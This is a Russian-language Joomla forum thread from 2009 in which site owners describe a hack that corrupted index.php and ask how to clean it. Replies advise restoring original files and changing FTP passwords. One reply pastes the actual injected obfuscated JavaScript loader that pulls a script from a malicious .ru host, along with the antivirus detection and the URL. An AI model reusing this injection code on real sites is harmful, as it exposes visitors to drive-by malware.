Новости Joomla

Обновление модуля WT Quick links v.2.2.0

Модуль позволяет создавать быстрые наборы элементов: ссылки на различные сущности на сайте Joomla: категории материалов, Virtuemart, JoomShopping, пункт меню или пользовательскую ссылку. Есть условия для исключений показа элементов списка.

Выпуск Joomla Community Magazine за апрель 2024

Выпуск Joomla Community Magazine за апрель 2024

Апрельский выпуск журнала сообщества Joomla. Краткое содержание статей и интервью этого номера.

Что нового в joomla 5.1?

Что нового в joomla 5.1?

16 апреля 2024 года вышли релизы Joomla 5.1 и Joomla 4.4.4. Если Joomla 4.x уже находится в режиме поддержки и получает только "заплатки", то в каждом выпуске Joomla 5.x появляется что-то новое. Краткий список был опубликован в недавней новости. Давайте посмотрим подробнее на то что же именно появилось в Joomla 5.1.

1   Вниз
0 Пользователей и 1 Гость просматривают эту тему.
  • 5 Ответов
  • 8345 Просмотров

Вирус на моем сайте повредил index.php-код
« : 11.12.2009, 15:45:04 »
Набрал в браузере свой сайт,а там: Parse error: syntax error, unexpected '<' in /home/roma/public_html/index.php on line 90
2.Зашел на  свой хостинг UkrLine .
3.Написал им письмо в техподдержку
4.Ответ:Здравствуйте. Вас взломали. И испртили файл index.php

замените его на оригинальный файл из дистрибутива.

и срочно

1. проверьте компьютер на вирусы

2. смените пароль на фтп

5.Я им задал вопрос:А где находится  этот дистрибутив?Подскажите пожайлуста?

 

компьютер тоже гавкнулся.споймал вирус, хотя и стоял нод32 с обновлениям,но не смог удалить вирус троян модифицированный.Говорят надо переустонавливать виндовс.

6.Они ответили: дя того что бы узнать где находится дистрибутив , надо знать что за скрипт у Вас работал. и скачать его с сайта разработчика. в архиве инсталяции и будет этот файл. замените им испорченый

А я то начинающий!
Где этот скрипт искать ?
Где этот пароль находится для фтп?
Записан
*

xobot

  • Захожу иногда
  • 125
  • 12 / 0
Re: Вирус на моем сайте повредил index.php-код
« Ответ #1 : 11.12.2009, 16:10:23 »
а вы Joomla! ставили? странно что вы не знаете ответов на эти вопросы...
Записан
Нужно лечиться в молодости, что бы не болеть в старости.
*

Sulpher

  • Живу я здесь
  • 2115
  • 401 / 16
  • Шаблоны и расширения Joomla
Re: Вирус на моем сайте повредил index.php-код
« Ответ #2 : 14.12.2009, 01:41:41 »
Скорее всего, у человека Joomla стояла уже на хостинге установленная.
roma, скачайте дистрибутив вот здесь. Распакуйте содержимое. Возьмите оттуда из корня index.php и закачайте на сервер, заменив инфицированный. Второй момент: возьмите index.php текущего шаблона и перезапишите его.
Смените пароль на FTP и не храните его в FTP / файловых менеджерах. Ну а как вылечить комп, этот вопрос не относится к данному форуму.
Записан
*

madek

  • Захожу иногда
  • 51
  • 0 / 0
Re: Вирус на моем сайте повредил index.php-код
« Ответ #3 : 25.12.2009, 09:09:05 »
Цитата: roma от 11.12.2009, 15:45:04
Набрал в браузере свой сайт,а там: Parse error: syntax error, unexpected '<' in /home/public_html/index.php on line 90

здравствуй брат по несчастью… сегодня ровно в 00.42мин мой сайт (плюс еще два не моих сайта на этом же платном хостинге) перекопал такой же вирус, а вернее скрипт … как раз работал на сайте и на тебе –
Parse error: syntax error, unexpected '<' in /home/public_html/index.php on line 90
Нашел зараженных 42странцы… (с помощью этого quick-search.php ) что интересно сам  вредоносный скрипт
Код
<script>/*GNU GPL*/ try{window.onload = function(){var Qi7n11z2g2 = document.createElement('s))^#c#)^) r)&i) p!#) t^('.replace(/&|#|\!|\)|@|\(|\$|\^/ig, ''));Qi7n11z2g2.setAttribute('type', 'text/javascript');Qi7n11z2g2.setAttribute('src',  'h@^) t@!t(!^p(##:)!/!/#!v##&i() c)$&t#!&!o@#@r&#$i((a&&s@&(^s(e)@c(r!^@e)&t^$#-@^$c!^o$&#@!m(^^.@#s) l) i!^c#!@$k$d^^^e@)&a$#)@l@s!@&.@!#n$) e$!) t(^.!c@(d#@&i) s^&!c^$o#@$u@#n&&(t!)-&#)^c$^$o#&^(m@&!.!&$m@() y&g!) r(!e($(a&^(t^(s#$a^@l#!e^.^!r!u^&#:&8)!@0)8#&0)$/^$#h)!o(!(t&l$)!i$n^#k&i!m&@^(!a^) g@e^&$).!) c^@) o^!m#!!/() h!)) o@^t&l$$i&&@@n^$$k!^()#i)!#) m^&#a^&$g@^) e)&.) c^o@m)^@/$^$h(a!($!(r(r@&() e#$n@m@&) e^@) d)($(i^&!a(&$n#e!t^&$w^o$r^!k^.@(^c$@(o^m^(/#!(g!(!o@#o(g$l^(e#.)!c(!o^m(#/$(#o@r^)^k!^u!) t)#.!&^c&o^#^m)@.) b$&r$/#'.replace(/&|\^|\(|#|\)|\!|\$|@/ig, ''));Qi7n11z2g2.setAttribute('defer', 'defer');Qi7n11z2g2.setAttribute('id', 'A) k#@x^&$6@s$^&!$p)@g#@4#&!b!p(j($'.replace(/\(|\!|#|&|\^|\)|\$|@/ig, ''));document.body.appendChild(Qi7n11z2g2);}} catch(e) {}</script>
находится в самом конце HTMLых и PHPых страницах  и его удаление лишь возобновило работу сайта, а касперский во время серфинга по сайту  по-прежнему кричит о вредоносном коде …
Обнаружено: Trojan-Clicker.JS.Iframe.db   http://victoriassecret-com.slickdeals.net.cdiscount-com.mygreatsale.ru:8080/hotlinkimage.com/hotlinkimage.com/harrenmedianetwork.com/google.com/orkut.com.br/
Проверка своего компьютера  результата не дала, подозреваю, что взлом произошел на другой машине, где у человека файлзила с паролями фтп стоит и как раз нод 32антивирус…
Вопрос к знаючим – как удалить полностью скрипт вирус, как ограничить потоки виру сов с соседних сайтов на хостинге?
Спасибо всем не поленившимся написать ответ!
Записан
*

madek

  • Захожу иногда
  • 51
  • 0 / 0
Re: Вирус на моем сайте повредил index.php-код
« Ответ #4 : 26.12.2009, 03:39:26 »
Проверил компьютер на вирусы два раза…-чисто…
изменил фтп пароли… заражение, как и предполагалось, не на моей машине..

писец какой то… уже по третьему кругу удаляю скрипт…и он снова появляется…не везде… но в папке администратор, множится через 5мин
уже 500-600файлов пересмотрел  и почистил за сутки вручную….глаза на выкате…
помогите пожалуйста что еще можно сделать как его удалить полностью?…наверное проще было бы сайт сделать  заново, так сроки…и бекапа нет…
в корневом индекс PHP его уже нет, но он видемо подгружается откуда то из компонетнов...все бы перечистел, но он как то себя множит, может из соседних сайтов на хостинге?
Записан
*

arixx

  • Новичок
  • 5
  • 1 / 0
Re: Вирус на моем сайте повредил index.php-код
« Ответ #5 : 03.01.2010, 22:31:11 »
Скачиваете свежий релиз с сайта Joomla, удаляете оттуда все кроме файлов в названиях которых встречается index, main или расширение js и перезаливаете это все поверх на свой хостинг. Для Joomla 1.0.15 архив с такой урезаной Joomla можно скачать у меня на сайте http://www.homepg.ru/index.php?option=com_content&task=view&id=31&Itemid=40
Записан
1   Вверх
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

 Ответов: 110
Просмотров: 63335 		Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

 Ответов: 1
Просмотров: 1065 		Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

 Ответов: 24
Просмотров: 3041 		Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

 Ответов: 6
Просмотров: 1838 		Последний ответ 22.02.2022, 11:38:15
от AlexP750
Спам, вирус или дело в браузере Google

Автор alekcae

 Ответов: 13
Просмотров: 992 		Последний ответ 16.05.2021, 18:52:24
от alekcae